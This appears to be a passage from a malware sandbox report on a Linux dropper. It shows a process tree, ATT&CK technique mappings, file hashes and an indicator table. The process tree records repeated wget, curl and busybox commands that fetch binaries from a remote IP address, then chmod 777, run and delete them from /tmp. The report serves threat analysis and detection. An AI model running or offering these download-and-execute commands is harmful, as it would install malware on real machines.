- /usr/bin/wget
  wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:967
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:968
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:969
- /bin/chmod
  chmod 777 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - File and Directory Permissions Modification
  PID:970
- /tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  ./8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:971
- /bin/rm
  rm 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:972
- /usr/bin/wget
  wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:973
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:974
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:975
- /bin/chmod
  chmod 777 NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - File and Directory Permissions Modification
  PID:976
- /tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  ./NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Executes dropped EXE
  PID:977
- /bin/rm
  rm NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:978
- /usr/bin/wget
  wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:979
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:980
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:981
- /bin/chmod
  chmod 777 FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  ./FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Executes dropped EXE
  PID:983
- /bin/rm
  rm FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:984
- /usr/bin/wget
  wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:985
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:986
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:987
- /bin/chmod
  chmod 777 c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - File and Directory Permissions Modification
  PID:988
- /tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  ./c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Executes dropped EXE
  PID:989
- /bin/rm
  rm c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:990

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit

ioc	pid	Process
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	745	HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	753	EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	759	UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	773	2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	798	urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	822	A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	832	I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	838	DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	859	NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	880	FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	886	c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	892	GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	898	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	904	HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	910	HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	916	EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	922	UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	929	HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	935	I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	941	DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	947	2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	953	urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	959	A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	965	GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	971	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	977	NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	983	FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	989	c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr